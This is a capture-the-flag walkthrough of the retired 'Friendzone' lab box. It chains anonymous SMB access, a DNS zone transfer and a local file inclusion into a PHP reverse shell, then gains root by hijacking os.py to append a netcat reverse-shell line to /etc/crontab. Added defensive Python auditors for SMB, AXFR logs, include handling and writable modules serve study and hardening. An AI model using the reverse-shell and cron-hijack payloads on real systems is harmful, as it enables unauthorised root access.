Friendzone

Name: Friendzone
Release Date: 29 Sep 2018
Retire Date: 23 Feb 2019
OS: Linux
Base Points: Easy - Retired [0]
Adamm 00 days, 02 hours, 48 mins, 46 seconds
no0ne 00 days, 03 hours, 04 mins, 31 seconds
Creator: askar
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./friendzone 10.10.10.123

 
$  nmap -sC -sV -oA ./friendzone 10.10.10.123
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 20:48 EDT
  Nmap scan report for 10.10.10.123
  Host is up (0.065s latency).
  Not shown: 993 closed ports
  PORT    STATE SERVICE     VERSION
  21/tcp  open  ftp         vsftpd 3.0.3
  22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
  |   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
  |_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
  53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
  | dns-nsid: 
  |_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
  80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: Friend Zone Escape software
  139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  443/tcp open  ssl/http    Apache httpd 2.4.29
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: 404 Not Found
  | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
  | Not valid before: 2018-10-05T21:02:30
  |_Not valid after:  2018-11-04T21:02:30
  |_ssl-date: TLS randomness does not represent time
  | tls-alpn: 
  |_  http/1.1
  445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
  Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

  Host script results:
  |_clock-skew: mean: -59m42s, deviation: 1h43m55s, median: 17s
  |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
  | smb-os-discovery: 
  |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
  |   Computer name: friendzone
  |   NetBIOS computer name: FRIENDZONE\x00
  |   Domain name: \x00
  |   FQDN: friendzone
  |_  System time: 2020-04-02T03:49:33+03:00
  | smb-security-mode: 
  |   account_used: guest
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: disabled (dangerous, but default)
  | smb2-security-mode: 
  |   2.02: 
  |_    Message signing enabled but not required
  | smb2-time: 
  |   date: 2020-04-02T00:49:33
  |_  start_date: N/A

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 38.96 seconds

SMB, DNS, HTTP and HTTPS.  Let's start with the web services and SMB.  A quick smbclient -L 10.10.10.123 shows us a few shares:

 

  smbclient -L 10.10.10.123
  Enter WORKGROUP\kali's password:
 
          Sharename       Type      Comment
          ---------       ----      -------
          print$          Disk      Printer Drivers
          Files           Disk      FriendZone Samba Server Files /etc/Files
          general         Disk      FriendZone Samba Server Files
          Development     Disk      FriendZone Samba Server Files
          IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
  SMB1 disabled -- no workgroup available

 

One interesting note is the Comment field on the Files share.  It shows the share's actual location on disk (a path disclosure, CVE-2000-0649): /etc/Files.  The HTTP service shows a static page and HTTPS returns 404 Not Found.

Let's try connecting to the SMB shares and see what's available.  We can connect to the general share and we find a creds.txt file there.

  smbclient -N \\\\10.10.10.123\\general
  Try "help" to get a list of possible commands.
  smb: \> dir
    .                                   D        0  Wed Jan 16 15:10:51 2019
    ..                                  D        0  Wed Jan 23 16:51:02 2019
    creds.txt                           N       57  Tue Oct  9 19:52:42 2018
 
                  9221460 blocks of size 1024. 6458412 blocks available
  smb: \> get creds.txt
  getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
  smb: \> exit
  kali@kali:~/Friendzone$ cat creds.txt
  creds for the admin THING:
 
  admin:WORKWORKHhallelujah@#
 
We can't connect to Files, and Development is empty.
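Two things made the SMB stage possible: shares that accept a null session (guest access) and a share comment that gives away the on-disk path.  As an added example that is not part of the original writeup, the Python 3 script below audits an smb.conf for exactly those settings.  SAMPLE_SMB_CONF is constructed to resemble such a host; only the /etc/Files path comes from the share listing above, the other paths and the map to guest value are made up for the demo.

```python
#!/usr/bin/env python3
"""Audit an smb.conf for shares reachable without credentials.

Added example, not part of the original writeup. Reports shares that allow
guest (anonymous) access, whether they are writable, a global "map to guest"
setting that turns failed logins into guest sessions, and share comments that
leak the on-disk path. SAMPLE_SMB_CONF is a constructed configuration.
"""
import configparser
import sys

SAMPLE_SMB_CONF = """\
[global]
workgroup = WORKGROUP
map to guest = Bad User

[Files]
comment = FriendZone Samba Server Files /etc/Files
path = /etc/Files
guest ok = no
writable = yes

[general]
comment = FriendZone Samba Server Files
path = /srv/samba/general
guest ok = yes
writable = yes

[Development]
comment = FriendZone Samba Server Files
path = /srv/samba/development
guest ok = yes
read only = no
"""

TRUE_VALUES = {"yes", "true", "1"}


def truthy(value):
    return value.strip().lower() in TRUE_VALUES


def load_smb_conf(text):
    # smb.conf is INI-like; Samba keys are case-insensitive, which configparser's
    # default lower-casing matches. strict=False tolerates repeated keys.
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.read_string(text)
    return cp


def audit_smb_conf(text):
    """Return a list of (section, reason) findings."""
    cp = load_smb_conf(text)
    findings = []
    if cp.has_section("global"):
        mtg = cp["global"].get("map to guest", "Never")
        if mtg.strip().lower() != "never":
            findings.append(("global", "map to guest = %s: failed logins become guest sessions" % mtg))
    for share in cp.sections():
        if share.lower() in ("global", "homes", "printers"):
            continue
        s = cp[share]
        # "public" is a synonym of "guest ok"; "read only" is the inverse of "writable"
        guest = truthy(s.get("guest ok", s.get("public", "no")))
        writable = truthy(s.get("writable", s.get("writeable", "no"))) or not truthy(s.get("read only", "yes"))
        if guest:
            findings.append((share, "guest (anonymous) access" + (", writable" if writable else "")))
        path = s.get("path", "").strip()
        if path and path in s.get("comment", ""):
            findings.append((share, "comment discloses on-disk path %s" % path))
    return findings


def demo():
    return audit_smb_conf(SAMPLE_SMB_CONF)


if __name__ == "__main__":
    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SMB_CONF
    for share, why in audit_smb_conf(conf):
        print("[%s] %s" % (share, why))
```

Run it with the path to a real smb.conf as the only argument to audit a live host; with no argument it audits the constructed sample.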

That's everything we can do with SMB right now.  Let's try DNS.  The start page has an email address at friendzone.red, so let's try a zone transfer of that domain for more info.

 
  dig axfr friendzone.red @10.10.10.123

  ; <<>> DiG 9.11.14-3-Debian <<>> axfr friendzone.red @10.10.10.123
  ;; global options: +cmd
  friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
  friendzone.red.         604800  IN      AAAA    ::1
  friendzone.red.         604800  IN      NS      localhost.
  friendzone.red.         604800  IN      A       127.0.0.1
  administrator1.friendzone.red. 604800 IN A      127.0.0.1
  hr.friendzone.red.      604800  IN      A       127.0.0.1
  uploads.friendzone.red. 604800  IN      A       127.0.0.1
  friendzone.red.         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
  ;; Query time: 64 msec
  ;; SERVER: 10.10.10.123#53(10.10.10.123)
  ;; WHEN: Thu Apr 02 09:05:35 EDT 2020
  ;; XFR size: 8 records (messages 1, bytes 289)
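The transfer above succeeded because the server answers AXFR for anyone who asks; in BIND the fix is allow-transfer { none; }; (or a list of secondaries) in the zone or options block.  As an added example that is not part of the original writeup, the Python 3 script below covers the detection side: it flags AXFR/IXFR requests from unexpected sources in BIND's query log.  The log lines, the 10.10.14.5 client and the 10.10.10.2 secondary are constructed for the demo.

```python
#!/usr/bin/env python3
"""Flag zone transfer (AXFR/IXFR) requests from unexpected sources in BIND query logs.

Added example, not part of the original writeup. SAMPLE_LOG is constructed in
the shape BIND 9.11 writes for the "queries" logging category; the client
addresses in it are made up.
"""
import ipaddress
import re

# "client" line from BIND's queries category; the "@0x..." client handle appears on 9.11+.
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#(?P<port>\d+) "
    r"\((?P<qname>[^)]*)\): query: (?P<name>\S+) IN (?P<qtype>[A-Z0-9]+)"
)

# Constructed sample: an ordinary A lookup, an AXFR from a workstation, an AXFR from a secondary.
SAMPLE_LOG = """\
01-Apr-2020 20:48:12.101 queries: info: client @0x7f3c1c0a9b60 10.10.14.5#41337 (friendzone.red): query: friendzone.red IN A -E(0) (10.10.10.123)
01-Apr-2020 20:48:19.412 queries: info: client @0x7f3c1c0a9b60 10.10.14.5#53421 (friendzone.red): query: friendzone.red IN AXFR -ET(0) (10.10.10.123)
01-Apr-2020 21:00:00.003 queries: info: client @0x7f3c1c0b2e10 10.10.10.2#40021 (friendzone.red): query: friendzone.red IN AXFR -ET(0) (10.10.10.123)
"""


def zone_transfer_attempts(log_lines, allowed_sources):
    """Return (source_ip, zone, qtype) for every AXFR/IXFR not from an allowed network."""
    allowed = [ipaddress.ip_network(a, strict=False) for a in allowed_sources]
    hits = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m or m.group("qtype") not in ("AXFR", "IXFR"):
            continue
        src = ipaddress.ip_address(m.group("ip"))
        if any(src in net for net in allowed):
            continue  # a configured secondary is allowed to pull the zone
        hits.append((str(src), m.group("name").rstrip(".").lower(), m.group("qtype")))
    return hits


def demo():
    # 10.10.10.2 plays the role of the legitimate secondary (constructed)
    return zone_transfer_attempts(SAMPLE_LOG.splitlines(), ["10.10.10.2/32"])


if __name__ == "__main__":
    for ip, zone, qtype in demo():
        print("%s requested %s of %s" % (ip, qtype, zone))
```

Point zone_transfer_attempts at the real query log (and the real secondaries) to use it outside the demo; anything it returns is a host that asked for the whole zone without being configured to receive it.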
 

Let's add friendzone.red to our HOSTS file and see if we can get to an HTTPS page.

After accepting the self-signed certificate, we have an HTTPS page!  Getting warmer.  Let's check the other sub-domains of uploads, hr, and administrator1. We can access uploads and administrator1, but HR fails with not found.  On the administrator1.friendzone.red page, let's try the creds we found on the general share. We can log in and it tells us to visit dashboard.php.

If I'm following the logic correctly, we upload files on the uploads page and can access them from the administrator1 page.  The dashboard even gives us the handy identifiers image_id and pagename.  I tried uploading PHP shell pages, but they all failed.  I wonder if we can manipulate one of those parameters to get a local file inclusion (LFI).  Let's try it.  Using smbclient -N \\\\10.10.10.123\\Development we put the php-reverse-shell from Pentest Monkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) onto the Development share.  Now to figure out how to execute it.  We know that Files is /etc/Files, so it stands to reason that Development is actually /etc/Development and we would need to execute /etc/Development/phprs.php (I shortened the name for easier typing).  Start a netcat listener and then see if that path is accessible via the pagename parameter.

 

  https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/phprs
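The request above works because the dashboard trusts pagename, appends .php and includes whatever that resolves to.  As an added example that is not the box's dashboard.php, here is that pattern mirrored in Python beside a hardened version that allowlists the page name and checks that the resolved path stays under the page directory.  PAGE_ROOT, the "dashboard" page name and the benign sample URL are assumptions built around the URL above.

```python
#!/usr/bin/env python3
"""Vulnerable versus hardened handling of a "pagename" include parameter.

Added example, not part of the original writeup or of the target's code. It
mirrors the pattern the writeup exploits: take a page name from the query
string, append ".php", include the result. PAGE_ROOT and the page names used
here are assumptions.
"""
import os
import re
from urllib.parse import parse_qs, urlsplit

PAGE_ROOT = "/var/www/admin/pages"                   # hypothetical directory holding the includable pages
PAGE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # no slashes, dots, NUL or other path syntax


def resolve_page_unsafe(pagename):
    """The vulnerable pattern: include(pagename . ".php") with the parameter trusted.
    Any readable .php on disk, e.g. one dropped on a writable share, gets included."""
    return pagename + ".php"


def resolve_page_safe(pagename):
    """Allowlist the name, then confirm the resolved path is still under PAGE_ROOT.
    Returns None when the request must be rejected."""
    if not PAGE_NAME_RE.fullmatch(pagename):
        return None
    root = os.path.realpath(PAGE_ROOT)
    candidate = os.path.realpath(os.path.join(root, pagename + ".php"))
    # realpath follows symlinks; commonpath catches anything that escaped the root
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def pagename_from_url(url):
    """Pull the pagename parameter out of a dashboard request URL."""
    qs = parse_qs(urlsplit(url).query)
    return qs.get("pagename", [""])[0]


# Constructed sample requests: the one from the writeup and a benign one.
MALICIOUS_URL = "https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=/etc/Development/phprs"
BENIGN_URL = "https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=dashboard"


def demo():
    """Map each sample pagename to (unsafe resolution, safe resolution)."""
    out = {}
    for url in (MALICIOUS_URL, BENIGN_URL):
        name = pagename_from_url(url)
        out[name] = (resolve_page_unsafe(name), resolve_page_safe(name))
    return out


if __name__ == "__main__":
    for name, (unsafe, safe) in demo().items():
        print("%-28s unsafe -> %-32s safe -> %s" % (name, unsafe, safe))
```

The unsafe resolver turns the writeup's parameter into /etc/Development/phprs.php, which is exactly the file that was planted over SMB; the safe resolver rejects it before any path is built, and would reject traversal sequences for the same reason.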

 

Excellent!  www-data shell.  Move LinEnum.sh over to the target (either by serving it with python3 -m http.server or by putting it on the Development share via SMB and moving it to /tmp).  The results are in the CherryTree file.  Digging through the output, I don't see anything that jumps out, so let's check running processes with pspy.  After a few minutes, we see a cron job running reporter.py as root.  Let's check that out.


  cat /opt/server_admin/reporter.py
  #!/usr/bin/python

  import os
 
  to_address = "admin1@friendzone.com"
  from_address = "admin2@friendzone.com"

  print "[+] Trying to send email to %s"%to_address
 
  #command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

  #os.system(command)
 
  # I need to edit the script later
  # Sam ~ python developer
 
Looks like it just sends a mail message.  Nothing useful on its own, but if we combine it with lines 150 and 1338 of the LinEnum output, we see that we can modify os.py, the module this script imports.  Let's use that to hijack crontab.  Create an os.py on your machine with this code, then put the new file into /etc/Development on the target via SMB:


  shell = '''
  * * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1| nc 10.10.XX.XX 9991 > /tmp/f
  '''
  f = open('/etc/crontab','a')
  f.write(shell)
  f.close()

 

Now we copy our os.py over to /usr/lib/python2.7/os.py, start a netcat listener, and wait for the fireworks.  Kaboom.  Root shell.
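What made that last step possible is a root cron job importing from a library directory that a low-privilege user could write to.  As an added example that is not part of the original writeup, the Python 3 audit below walks module directories and reports module files (or directories) that are group/world-writable or not owned by root.  FAKE_FS is a constructed filesystem used for the demo, with a world-writable os.py standing in for the finding LinEnum reported; running the script directly audits the live interpreter's sys.path instead.

```python
#!/usr/bin/env python3
"""Report Python modules that a non-root user could replace.

Added example, not part of the original writeup. A root cron job that does
`import os` trusts every directory on the interpreter's module search path, so
a group- or world-writable os.py (or a writable directory where a new module
can be dropped) hands root to whoever can write there. FAKE_FS below is a
constructed filesystem for the demo; running the script audits the live sys.path.
"""
import os
import stat
import sys
from collections import namedtuple

Stat = namedtuple("Stat", "st_mode st_uid")        # the two fields of os.stat_result used here
MODULE_SUFFIXES = (".py", ".pyc", ".so")


def writable_by_non_root(st):
    """Group- or world-writable, or owned by someone other than root."""
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)) or st.st_uid != 0


def audit_module_dirs(dirs, stat_fn=os.lstat, list_fn=os.listdir):
    """Return (path, reason) for every module directory or module file that is not root-only writable."""
    findings = []
    for d in dirs:
        d = d or "."                                  # an empty sys.path entry means the current directory
        try:
            dir_st = stat_fn(d)
        except OSError:
            continue
        if not stat.S_ISDIR(dir_st.st_mode):
            continue
        if writable_by_non_root(dir_st):
            findings.append((d, "directory writable: new modules can be planted"))
        try:
            names = list_fn(d)
        except OSError:
            continue
        for name in sorted(names):
            if not name.endswith(MODULE_SUFFIXES):
                continue
            path = os.path.join(d, name)
            try:
                st = stat_fn(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and writable_by_non_root(st):
                findings.append((path, "mode %o, uid %d" % (stat.S_IMODE(st.st_mode), st.st_uid)))
    return findings


# Constructed sample filesystem: the standard library with a world-writable os.py,
# plus the cron script's own directory, which is correctly root-only.
FAKE_FS = {
    "/usr/lib/python2.7": Stat(stat.S_IFDIR | 0o755, 0),
    "/usr/lib/python2.7/os.py": Stat(stat.S_IFREG | 0o777, 0),
    "/usr/lib/python2.7/re.py": Stat(stat.S_IFREG | 0o644, 0),
    "/opt/server_admin": Stat(stat.S_IFDIR | 0o755, 0),
    "/opt/server_admin/reporter.py": Stat(stat.S_IFREG | 0o644, 0),
}


def fake_stat(path):
    try:
        return FAKE_FS[path]
    except KeyError:
        raise OSError(path)


def fake_listdir(d):
    prefix = d.rstrip("/") + "/"
    return [p[len(prefix):] for p in FAKE_FS if p.startswith(prefix) and "/" not in p[len(prefix):]]


def demo():
    return audit_module_dirs(["/usr/lib/python2.7", "/opt/server_admin"], fake_stat, fake_listdir)


if __name__ == "__main__":
    for path, why in audit_module_dirs(sys.path):
        print(path, why)
```

On a correctly installed system the live run prints nothing; any line it does print is a module a root-owned script might import from a location someone else can change.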